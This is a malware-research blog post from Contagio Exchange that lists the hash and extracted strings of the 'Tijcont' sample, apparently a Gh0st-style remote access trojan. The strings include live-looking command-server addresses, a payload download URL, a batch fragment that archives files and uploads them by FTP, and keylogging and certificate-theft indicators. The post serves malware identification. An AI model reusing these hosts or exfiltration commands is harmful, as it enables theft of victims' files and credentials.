About contagio exchange

CONTAGIO EXCHANGE
Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community-driven malware collection.
Edit Aug 2013 - The community is busy, and Mila too, so this has not been a very active site (my fault, probably). I will just be dumping malware strings here - it often helps in malware identification, and googling is the best way.
With just strings, it is not exactly a fun blog to read, but it might become a useful resource over time.
I will not be posting samples here, just MD5 hashes. You can find the corresponding samples on contagio, or ping me if you can't find them.
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Sunday, September 8, 2013

Tijcont strings - CRIME

File: Tijcont
MD5:  845b0945d5fe0e0aaa16234dc21484e0
Size: 475152





GET /3.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 110.34.198.123:888
Connection: Keep-Alive

GET /s/blog_b2afd7fe01019tkf.html HTTP/1.1
User-Agent: getURLDown
Host: blog.sina.com.cn

GET /album/w=1600;q=90/sign=862e65d610dfa9ecfd2e521152e0cc72/9358d109b3de9c82a5a5fe456d81800a18d84333.jpg HTTP/1.1
User-Agent: loadMM
Host: e.hiphotos.bdimg.com

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
?zRich
.text
`.rdata
@.rsrc
hG @
hq @
hc @
hG @
%< @
%8 @
%  @
%$ @
%( @
%0 @
c:\windows\temp\temp%d.exe
wsprintfA
MessageBoxA
user32.dll
CloseHandle
CreateFileA
ExitProcess
GetFileSize
GetModuleFileNameA
GetSystemInfo
ReadFile
SetFilePointer
VirtualAlloc
VirtualFree
WriteFile
kernel32.dll
ShellExecuteA
shell32.dll
!This program cannot be run in DOS mode.
RichM
.text
`.rdata
@.data
.rsrc
WPQj
SUVWj
T$(j
@h`0@
-d @
h\0@
IQRV
D$0k
-T @
L$Tf
T$hjfR
D$pP
SSSSj
L$8Qj
T$TR
=l @
hp0@
D$TP
_^]3
hSVW
>"u:F
XPVSS
CloseHandle
FreeResource
Sleep
WriteFile
CreateFileA
DeleteFileA
SizeofResource
LockResource
LoadResource
FindResourceA
GetModuleFileNameA
WaitForSingleObject
CreateEventA
GetProcAddress
LoadLibraryA
GetWindowsDirectoryA
GetTickCount
KERNEL32.dll
RegisterClassA
LoadCursorA
LoadIconA
USER32.dll
GetStockObject
GDI32.dll
RegCloseKey
RegSetValueExA
RegOpenKeyA
RegCreateKeyExA
StartServiceA
ControlService
ChangeServiceConfigA
OpenServiceA
OpenSCManagerA
ADVAPI32.dll
sprintf
rand
srand
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
DLLPath
SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip
c:\NT_Path.jpg
Glable__Wait
Advapi32.dll
CloseServiceHandle
RemoteAccess
%s%d.dll
My Win32
Bome
!This program cannot be run in DOS mode.
U1Rich,
.text
`.rdata
@.data
.rsrc
@.reloc
Wh `
SSSS
SSSS
j PQ
F@j RP
_^][
_^]2
_^]2
GD_^][
SUVWh(a
_^]2
{@Rh
_^]2
CE][Y
SUVWh
_^]3
D$ y
[_^]
[_^]
^][Y
QSUV
.PQV
^][Y
SUVW
_^]3
_^]3
_^]3
_^]d
 SUVW
_^]2
_^]2
L$ j
_^]2
uLj0
_^][
_^][
t$$P
_^][
L$(j
D$,P
L$(QU
_^][
t$ W
D$$@
D$$|
_^][
t$ f
t-f=e
t'f=
WWRh
Sh@8
Sh@8
|$$3
L$ f
D$$P
D$ 3
D$ j
;|$ r
_^]3
T$(f
T$,f
L$(Q
T$$j0
L$ j
;|$ r
][_3
T$(h
T$(h
_^]3
|$$3
L$ f
D$(P
L$ j0
_^]3
_^][
L$ f
t}j0
_^]3
L$<j
T$8j
T$Qf
D$(E
T$)f
D$.@
D$ Pf
T$Th
D$DPf
D$&f
|$xf
T$|j
|$|f
T$dj
j(PQ
]_^3
SUVW
_^][d
HGPW
?\uK
8\uC
tY<\uG
L$,h
|$8h
L$<QVVVVVU
L$8GQ
<AtG<BtC
T$ j
|$0W
_^][
D$ %
D$!s
D$"\
D$$.
_^][
jBWS
L$T$
L$(QR
L$$US
_^][
D$ .
_^]2
|$D.tL
L$DQV
^_][
^_][
\u!V
D$,W
D$(u
|$\.
D$\PWVh
L$ U
D$ ;
T$0RP
L$,Q
_^]d
_^jk
_^][
_^][
{ PW
T$$j
_^][
_^][
_^][d
L$0Ph
L$0Q
L$0Ph
L$0Q
t$`W
QRPPPPPPVP
D$L(c
t$`W
QRPPPPPPVP
|$`j/W
D$@D
D$H(c
D$$o
D$%p
D$&e
D$'n
_^][
Ph`Q
Ph@R
Ph S
Ph W
HFPVj
Vh f
L$8SQ
t"j0
D$8SP
_^][
_^][
SUVWj
PWVS
_^][Y
T$ h
L$ Q
D$"Q
l$4SQ
T$$VU
D$$[
D$<_^][
< uX
;!u'
(SVW3
QSSSSSSSSj
QSUV
_^][Y
T$$h
tiWS
PWVS
.RPS
_^][
SSSUh
_^][
_^][
_^][
_^][
_^][
_^][
L$@h
T$@h
T$@3
D$DRP
D$TSUVW
_^][d
_^][
QSUVW
_^][Y
_^][d
tfjdj
t5jdj
QSVW
IGQW
JGRW
_^][
QSUVW
_^][Y
_^][
QUVWh$e
t4j0
wQt1-
_][^
t\SV
t6WS
SUWV
_][^
DSUV
n0hTe
F,PQR
NDPQ
FDQj
FLRP
VHQR
F(RPj
^][d
QSUV
_^][d
\$(UVW3
D$$P
NxRPQ
~0;~,}
_^][
_^]3
SUVWh
N(Uj
^4Uj
_^]2
QSVW
_^[Y
NLRj
SUVW
VPQR
FDQRPUSQ
NLRQ
NLh
RPQUSj
T$@j
_^][
SUVh
\$ 3
D$ Q
RWPVj
T$4j
_^][Y
:;9t_
SUVW
L$(3
L$$j
T$$j
L$8Q
D$@D
D$|h
T$8QRj
u'j0
^][d
QSUV
_^][d
PSUQ
^_][
SUVWh8f
D$$h
PQVR
D$$h
$t&Ht
HAPQ
_^[Y
UVW3
D$0(
D$(PQ
T$,j0
T$0j0
L$LQ
jBVS
t$LA
L$(QR
jBWS
(VWj0
7jBQU
(_^]
T$,Vj
D$ Q
L$ Rh`
SUVW
SUVW3
UUUUh
l$ u
_^]2
_^]2
L$(Ph
|$(MZu'
T$$SR
L$0PQR
L$ Q
SSSS
SSSSSSSSh
L$@jdQV
,SUVW
_^][
_^]2
_^]2
RSh,
Pj,h-
_^]2
Rj,h
QPPVhp
_^][
Fxh@g
_^][
F,_^[
L$ d
l$0t
L$ d
D$ M263
D$$IV32
D$(MP42
D$,cvid
vidc
Qhvidc
FDtX
Vxhlg
FLPQh
NDhTg
NHQU
NLPQh
^[_]d
FxSW
SUVWh
L$LjdQV
D$tW3
D$xf
QRSVSSf
Shpc
T$ QRSh
L$(R
L$df
D$4
SUVWh
_^][
_^][
_^][
SUVW
PhPn
_^]3
D$$Q
D$,f
D$0tn
WPjfP
t$8h
WWWh
WWWh
ItJU
\u+V
]_^[
,SVW3
VWh?
SUVW
T$$QR
D$|P
PQSh?
SSSRh
D$|P
_^][
SUVW
T$ h
L$(PQ
_^][
_^][
_^@[
SUVW
L$$j
|$TR
_^][
_^]3
\$.f
\$6f
T$ f
|$"f
L$$f
D$&f
|$(f
T$*f
t$,f
D$0f
|$2f
t$4f
L$8f
D$:f
|$<f
T$>f
L$@f
L$Bf
L$Ff
D$Hf
|$Jf
T$Lf
L$Nf
L$Pf
t$Rf
D$Tf
D$Vf
L$Xf
D$Zf
L$\f
T$^f
t$`f
D$bf
D$df
L$ff
D$hf
L$jf
T$lf
T$nf
L$pf
D$rf
T$tf
t$vf
D$xf
\$zf
D$|f
|$~f
SUV3
_^]3
T$<VW
D$DS
\$DV
N(PQ
~(9~$u
_^][
_^][
_^][
_^][
|$08
W(9W$u
\$ ;
D$(;
_^][
_^][
tZ9H tU9H$tP
n ux
_^]3
F|UV
_^]3
_^]3
_^]3
V(PR
N(PQ
V(QR
B<Wf
_^][
U0SQR
Fdf+Fh
Nlw^
~@B3
SUVW
T$ v
D$(8D*
D$ ;
_^][
QSUV
nXtX
f+F\
VlH3
NlBI
FlAH
^][Y
_^]3
G(RP
G0_^
W(VR
G(Sj
W(QR
G(VP
D$8S
\$8U
C0V;
L$Ds
D$$R
L$,P
T$4Q
D$<RP
D$<Q
L$DR
T$LPQR
 s,3
T$D;
T$Ds
|$HPWS
T$Ds
D$ u"
T$Ds
L$ +
t$Hj
N(PQ
D$4s
L$ ;
L$DRQ
L$0R
T$(PQR
N(PQ
T$DPVS
L$Ds
L$LQP
_^][
_^][
_^][
_^][
D$HQ
_^][
_^][
T$LRWS
_^][
L$D+
T$LRP
_^][
_^][
L$L+
_^][
F(RP
_^][
L$LQV
_^][
F(RP
_^][
V(QR
T$HVS
_^][
_^][
L$LQVS
K4PVS
_^][
_^][
_^][
L$H+
_^][
N(PQ
F(RP
N(WQ
|$ WUSV
@APQV
_^][
D$$f
T$ RV
_^][
_^][
D$$SUV
L$03
t$ f
D$0tb
D$0H
_^][
]_^[Y
HPQV
JRPV
_^][
T$ }
]_^[
l$ 3
l$ f
l$ f
l$ f
t$ W
WVQR3
D$,s
D$(3
L$$r
D$$#
D$(3
L$$r
D$$#
D$(3
L$$r
D$$#
D$(3
L$$r
D$$#
T$,RWV
;N,u
T$,RWV
T$,RWV
_^][
_^][
L$,QWV
_^][
T$,RWV
_^][
_^][
_^][
_^][
|$ j
L$ RUPj
W(SR
^]_[Y
W(SR
^]_[Y
9t$Tu
:_^]3
T$,v
T+3x%A
t$Dy
t$DB
L$,;
T$,+
L$H;
D$1+
T$0+
;D$<s!
;D$<r
|$8M#
L$,B;
t$D3
\$,UV
C(Wj
L$4R
T$,PQh
L$8R
T$(P
D$0Qh
C(WP
_^][Y
K(WQ
_^][Y
K(WQ
_^][Y
K(WQ
_^][Y
S(WR
_^][Y
S(WR
_^][Y
K<UWQ
K<UVQ
L$(SU
t$0#
t$4#
L$,+
l$(+
l$(+
GFMu
GFIu
GFIu
GFIu
\$8+
{4_^]3
\$8+
{4_^]
\$8+
{4_^]
NWVS
u7WPS
u&WVS
_^[]
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
 inflate 1.1.4 Copyright 1995-2002 Mark Adler
CreateEventA
LoadLibraryA
FreeLibrary
CloseHandle
TerminateThread
Sleep
GetProcAddress
WaitForSingleObject
SetEvent
ResumeThread
CreateThread
DeleteCriticalSection
VirtualFree
LeaveCriticalSection
EnterCriticalSection
VirtualAlloc
GetLastError
ResetEvent
InterlockedExchange
CancelIo
GetTickCount
GetLocalTime
GetCurrentProcessId
HeapAlloc
GetProcessHeap
DeleteFileA
CreateDirectoryA
GetFileAttributesA
lstrcpyA
lstrlenA
GetDriveTypeA
GetDiskFreeSpaceExA
GetVolumeInformationA
GetLogicalDriveStringsA
FindClose
LocalFree
FindNextFileA
LocalReAlloc
FindFirstFileA
LocalAlloc
RemoveDirectoryA
GetFileSize
CreateFileA
ReadFile
SetFilePointer
WriteFile
MoveFileA
lstrcatA
GetSystemDirectoryA
CreateProcessA
ExitProcess
Process32Next
lstrcmpiA
Process32First
CreateToolhelp32Snapshot
HeapFree
MapViewOfFile
CreateFileMappingA
UnmapViewOfFile
GetModuleHandleA
GlobalFree
GlobalUnlock
GlobalLock
GlobalAlloc
GlobalSize
GetStartupInfoA
WaitForMultipleObjects
LocalSize
TerminateProcess
OpenProcess
GetCurrentThreadId
GlobalMemoryStatus
GetSystemInfo
GetComputerNameA
GetVersionExA
OpenEventA
SetErrorMode
GetCurrentProcess
GetWindowsDirectoryA
SetFileAttributesA
CopyFileA
ExpandEnvironmentStringsA
GetModuleFileNameA
KERNEL32.dll
DispatchMessageA
TranslateMessage
GetMessageA
CharNextA
wsprintfA
GetWindowTextA
MessageBoxA
LoadCursorA
BlockInput
SendMessageA
keybd_event
MapVirtualKeyA
SetCapture
WindowFromPoint
SetCursorPos
mouse_event
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
GetClipboardData
GetSystemMetrics
SetRect
GetDC
GetDesktopWindow
ReleaseDC
DestroyCursor
GetCursorInfo
GetCursorPos
ExitWindowsEx
GetWindowThreadProcessId
IsWindowVisible
CloseDesktop
SetThreadDesktop
OpenInputDesktop
GetUserObjectInformationA
GetThreadDesktop
OpenDesktopA
PostMessageA
IsWindow
CloseWindow
CreateWindowExA
LoadMenuA
RegisterClassA
LoadIconA
USER32.dll
GetStockObject
GDI32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
CloseEventLog
ClearEventLogA
OpenEventLogA
RegSetValueExA
RegCreateKeyExA
CloseServiceHandle
DeleteService
OpenServiceA
OpenSCManagerA
FreeSid
SetSecurityDescriptorDacl
AddAccessAllowedAce
InitializeAcl
GetLengthSid
AllocateAndInitializeSid
InitializeSecurityDescriptor
RegOpenKeyA
SetServiceStatus
RegisterServiceCtrlHandlerA
UnlockServiceDatabase
ChangeServiceConfig2A
LockServiceDatabase
CreateServiceA
StartServiceA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegSaveKeyA
RegRestoreKeyA
RegDeleteKeyA
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
??2@YAPAXI@Z
??3@YAXPAX@Z
puts
__CxxFrameHandler
memmove
putchar
ceil
_ftol
strstr
_CxxThrowException
rand
sprintf
strncpy
free
malloc
_except_handler3
strrchr
_beginthreadex
atoi
wcstombs
_access
srand
calloc
MSVCRT.dll
??1type_info@@UAE@XZ
_initterm
_adjust_fdiv
WSAIoctl
WSASocketA
WS2_32.dll
?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z
?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z
?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z
?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ
?_Xran@std@@YAXXZ
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
MSVCP60.dll
_strrev
_stricmp
Work.dll
EndWork
Runing
ServiceMain
Working
WINMM.dll
waveOutUnprepareHeader
waveOutClose
waveOutReset
waveInUnprepareHeader
waveInClose
waveInStop
waveInReset
waveOutWrite
waveInStart
waveInAddBuffer
waveInPrepareHeader
waveInOpen
waveInGetNumDevs
waveOutPrepareHeader
waveOutOpen
waveOutGetNumDevs
InitializeCriticalSection
kernel32.dll
WS2_32.DLL
connect
.PAX
.PAD
bad Allocate
bad buffer
2008
2003
2000
ProductName
SOFTWARE\Microsoft\Windows NT\CurrentVersion
%s%d%s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)
InternetOpenUrlA
InternetOpenA
InternetCloseHandle
WININET.dll
%d.%d.%d.%d
ShellExecuteA
Shell32.dll
SHGetFileInfoA
%s\%s
%s%s%s
%s%s*.*
\syslog.dat
WinSta0\Default
Gh0st Update
System
Security
Application
NetSubKey
EnumWindows
user32.dll
IMM32.dll
[%02u-%02u-%d %02u:%02u:%02u] (%s)
GetWindowTextA
GetActiveWindow
GetKeyNameTextA
CallNextHookEx
ImmReleaseContext
ImmGetCompositionStringA
ImmGetContext
MyCreateMa
SetWindowsHookExA
UnhookWindowsHookEx
\Plugin
PluginEnd
PluginStart
PluginDelete
%s   %s   %s
PluginDescript
%s\*.*
DestroyCursor
User32.dll
SystemParametersInfoA
USER32.dll
SelectObject
CreateDIBSection
CreateCompatibleDC
GDI32.dll
DeleteObject
DeleteDC
BitBlt
GetDIBits
CreateCompatibleBitmap
CreateProcessA
\cmd.exe
CreatePipe
Kernel32.dll
CloseHandle
DisconnectNamedPipe
TerminateProcess
TerminateThread
PeekNamedPipe
GetModuleFileNameExA
EnumProcessModules
PSAPI.dll
SeDebugPrivilege
SeShutdownPrivilege
InternetReadFile
Mozilla/4.0 (compatible)
CVideoCap
capCreateCaptureWindowA
AVICAP32.dll
#32770
CreateWindowExA
capGetDriverDescriptionA
ICSeqCompressFrame
ICSeqCompressFrameStart
ICSendMessage
ICOpen
MSVFW32.dll
ICClose
ICCompressorFree
ICSeqCompressFrameEnd
tur&b`ohpcvo/akn
kwur9*-qus/achfs,`lo.hs(vyv
13321=07^e`ohpcvo
Qrf[sb
Wmhnvf"Uqkbg`vwm"Gddm",QQB!!Qaqwhfg
"SRB"
 QzqqmhSmlv _Wxqpfh;0XWxbQr`/q{e
~MHz
HARDWARE\DESCRIPTION\System\CentralProcessor\0
Global\Net_%d
My Win32 Applaction
WIN32 Application
SeBackupPrivilege
SeRestorePrivilege
ServiceDll
%s\Parameters
SOFTWARE\%d
Net-Temp.ini
SYSTEM\CurrentControlSet\Services\
imgsvc
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
\Parameters
%SystemRoot%\System32\svchost.exe -k imgsvc
Glable__Wait
c:\NT_Path.jpg
1.1.4
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
invalid distance code
invalid literal/length code
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
.?AVtype_info@@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.34</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
1#1+141A1I1Q1a1i1q1
3Z3`3g3
4'4Y4^4
5;5A5F5o5t5
5F6Q6b6
6C7_7e7z7
7C819F9g9m9|9
:!:U:z:
:$;.;
<)<X<`<
<+=?=z=
> >&>;>
?8?F?T?e?p?
0-0?0]0t0
0>1Q1
4*5>5T5h5|5
5K7X7^7v7
768B8|8
9=9B9_9
:$:*:3:F:Y:
;!;9;[;|;
<$=N=o=
>A>T>x>
>&?4?8?<?@?D?H?L?P?T?X?\?
"070=0[0l0
041=1
2C2I2h2
3"3,3I3Z3f3l3
4#4,4M4Z4m4r4y4
5/5T5
607|7
949j9
9 :[:`;h;{;
;3<T<
<K=a=i=(>,>0>4>8><>@>D>H>L>P>T>X>\>f>k>
?8?L?a?n?
2!2[2
2:3D3K3
3&4B4M4
4'535>5E5
7/7_7
8,989F9P9^9w9
:f;w;
;B<k<
<[=s=
0*020Y0i0u0
1C2e2o2#3E3O3
4%4/4
7#7E7O7
8%8/8
9R:~:
:!;';.;5;h;
<5<J<Q<p<w<
<'=.===^=x=
>D>r>
?$?/?
1"141Y1_1t1x1|1
122;2B2M2j2
4+4u4
4F5R5_5k5p5z5
5,63696>6F6r6w6
7 747:7Y7t7
8$8W8^8
9q9x9
:#:,:3:8:>:C:L:Q:\:a:m:v:
;#;@;
<$<5<A<L<q<
='=.=5=O=a=h=o=
>.><>M>T>g>}>
?N?]?d?i?n?
0#00080B0Q0V0]0c0s0
1M1V1]1x1
2 2U2\2
3#3R3Z3_3p3u3
324[4t4
6)6j6
6+7R7^7e7s7
888D8L8h8
:*:1:?:F:U:{:
>!>Y>u>
L03181<1@1D1H1L1P1T1X1\1`1d1h1l1
3E3K3R3]3n3}3
5X5b5v5
5X6\6`6d6h6l6p6
7'717a7g7
9!959K9t9|9
:U:Z:
:3;R;k;q;w;|;
< <B<
>)>R>[>d>
0,020:0J0O0j0p0u01171@1
2p2u2|2
2,323?3R3Z3c3
5!545O5
6!6V6^6e6
6S7r7x7
82878q8x8
909r9
:":':c:
:B;R;r;
;1<C<
=)>X>]>r>
?B?e?{?
0!0(0;0f0
1&1.1@1K1t1{1
2:2A2b2v2
273d3
5 5-54595N5S5\5k5t5
686a6g6l6
8Q8Z8~8
8 :3:c:o:
:#;>;M;d;h;l;p;v<}<
=+=J=r=|=
>)?/?5?d?
0f1q1
2.3[3
4:4M4
5"5I5j5p5u5{5
6 6>6D6_6s6x6
7$8X8k8}8
9#9+90969@9W9_9j9r9|9
:<:C:i:n:u:|:
:G;U;\;c;
<"<F<`<k<
>4?9?
Q0`0
1^1e1p1v1
2;2d2
3D3c3
5<5I5O5d5
;(;.;3;N;Z;a;k;y;
;=<C<
<7=g=
5 5$5(5,5v5
557F8
9=9w9|:5<A<P<_<
={>*?
2e3T4`6d6h6l6p6t6x6|6
8a:o:
;E=J=
-0<0_4k5_6
;G<g<
1<2[2z2
7"8(8.8B8
9$9/9<9F9[9g9m9
: :&:9:Y:|:
;4;T;e;j;
<7<W<w<
</=T=
>9>Q>i>
4 4$4(4p4|4
t1x1
2 2<2H2d2l2t2
3 3(3X3l3x3
4(4D4P4l4t4
5,545@5\5d5p5
606D6P6l6x6
7 7P7d7p7x7
848@8\8h8
9,989T9\9
081<1P1T1l1
9999999
y999
y99w
s:/::@s
         C CTz
0      CCCCCCCCCCTz
       C CCCCCCCICIJQz
p     ((+))(+++.C.IIJJJJW
/
!#*,,HJJJJJP
   9
$*HHKKPRS
!*2JPSSSx
@
'HPSSk
B  t
"4PZ\x
"6Wjl
   BAAABC adw
:    AAACCEE.CCEP
B   AAACCCCAEEEEEJJh
  B AB +B+++...E.H.IM
    ))!
!##$**$$
:  +
`[jkl
mVRYY[jkx
!CJJJJJIKKKYRRRRSS\jk
5  T
*.JJJKKKKKKKRRYYS\jk
  CC
*.JJJKKKKKRRRRYS\jl
 C CF
$12HHKKKRRRRYS\j
p  CACO
%$11122424[\j
/ AACACF
71V\l
 CCCACCAEv
/CAACCCAIAI
CACACCEEIIIIS
3V\l
LCCCCEEEIAJFJJJSl
pOEEEIIIJJJJJJRRRRSYRS[YY[[\
waIIJJJJRJRRRRRRYXXXXS\l
dJJRJRJRRRRRXXXX[[
tSRRRRRXXXX[[\
wZRRXXX[[
}5<<<V7x
<<<<<<AADDKt
%%'''',,CKMf
(.KN\
01OSe
0R`a
/<Gb<<ggv
<<<<+,,?ACCb
<<,$
hOY``l
 1KKUOYYYY_`
 11.KIOOS`
<<AX
o<<A<K
8<AADDD\
VA<DDJJJKe
pRJDMMMOOYYYYY___
}eMNNUNUUU___
lYUU___^
#&&&&&******&
*********
(*****
****
'***%
!! !    !!!!#
OLEE
-+'e
a]Ud
gc\_
jf_a
a]V]
))'4
a]Va
lkiU
c_Xd
eaZf
~}{b
gc[g
ZWSE
~~~&
jf]s
/-)s
ZWOQ
.,(-
443/
3220
31-1
>>=2
<:6J
VVU4
bba.
www.
___$
yyy3
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.34</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
!This program cannot be run in DOS mode.
MHIz
Y{jN'
lq}_'X
---------------------snip---------------------snip---------------------snip
h`]A
hP^A
h8_A
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
string too long
invalid string position
ios::eofbit set
ios::failbit set
ios::badbit set
Unknown exception
HeapAlloc
GetProcAddress
LoadLibraryA
lstrcatA
lstrlenA
CloseHandle
ReleaseMutex
GetLastError
OpenMutexA
GetTempPathA
WinExec
DeleteFileA
Sleep
FreeLibrary
WriteFile
lstrcpyA
CreateFileA
WaitForSingleObject
CreateThread
GetWindowsDirectoryA
GetCurrentProcess
CreateMutexA
ExitProcess
CopyFileA
GetModuleFileNameA
GetSystemDirectoryA
KERNEL32.dll
wsprintfA
USER32.dll
RegCloseKey
RegOpenKeyExA
RegEnumValueA
RegEnumKeyExA
RegQueryValueExA
RegSetValueExA
RegCreateKeyA
RegOpenKeyA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
ADVAPI32.dll
WSAIoctl
WS2_32.dll
URLDownloadToFileA
urlmon.dll
PathRemoveFileSpecA
SHLWAPI.dll
RtlUnwind
TerminateProcess
FindFirstFileA
FindNextFileA
FindClose
FileTimeToSystemTime
FileTimeToLocalFileTime
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
HeapReAlloc
HeapSize
HeapFree
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
MultiByteToWideChar
GetStringTypeA
GetStringTypeW
GetTimeZoneInformation
SetUnhandledExceptionFilter
IsBadReadPtr
IsBadCodePtr
GetCPInfo
GetACP
GetOEMCP
LCMapStringA
LCMapStringW
CompareStringA
CompareStringW
SetEnvironmentVariableA
RaiseException
SetFilePointer
FlushFileBuffers
ReadFile
SetStdHandle
REG_BINARY
%-24s %-15s
REG_MULTI_SZ
%-24s %-15s 0x%x(%d)
REG_DWORD
%-24s %-15s %s
REG_EXPAND_SZ
REG_SZ
[%s]
siqiao.gnway.net:8888
http://110.34.198.123:888/3.txt
174.139.45.210
xxxxxxxxxxxxx
ftp4aol
Twitter51234
http://siqiao.gnway.net/rar.exe
My_Host_URL
SYSTEM\CurrentControlSet\Services\%s
BITS
SYSTEM\CurrentControlSet\Services\BITS\
URLDownloadToFileA
urlmon.dll
Test.exe
http://ip.3322.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)
InternetReadFile
InternetOpenUrlA
InternetOpenA
InternetCloseHandle
WININET.dll
del %0
del %Update_TmpFile% /q
rd %Update_TmpFile% /q
del %Update_FileName%
rem Xcopy %Update_TmpFile%* C:\Temp /y
del ftp.sman /q
FTP -s:ftp.sman -i
echo bye >>ftp.sman
echo put %Update_FileName% >>ftp.sman
echo %Update_ftpUserPass% >>ftp.sman
echo %Update_ftpUserName% >>ftp.sman
echo open %Update_ftpServer% >>ftp.sman
"rar.exe" a %Update_FileName% %Update_TmpFile% "%Update_File%"
set Update_date=%date:~0,4%%date:~5,2%%date:~8,2%
set Update_ftpUserPass=
set Update_ftpUserName=
set Update_ftpServer=
set Update_FileName=
set Update_TmpFile=C:\~MyTemp\
set Update_File=
\*.*
Update.bat
npki
NPKI
Userinit
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
%s%s%s
\Tasks\csrss.exe
%s%s
\system32\userinit.exe
SeDebugPrivilege
rss.exe
\System32\rar.exe
\Tasks
\drivers\etc\Changer.bat
.?AVios_base@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@GU?$char_traits@G@std@@@std@@
.?AV?$basic_istream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_ostream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_filebuf@GU?$char_traits@G@std@@@std@@
.?AV?$basic_streambuf@GU?$char_traits@G@std@@@std@@
.?AVexception@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVruntime_error@std@@
.?AVfailure@ios_base@std@@
.?AVfacet@locale@std@@
.?AV_Locimp@locale@std@@
.?AVtype_info@@
!Win32 .EXE.
2J#R
.MPRESS1
.MPRESS2I
.rsrc
v2.17U
o\BU
OCxc
PZ8P
Q---------------------snip
C}'g
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
[hQkS
c!jWW
[hQkS
LJ#RBome
LJ#RBome
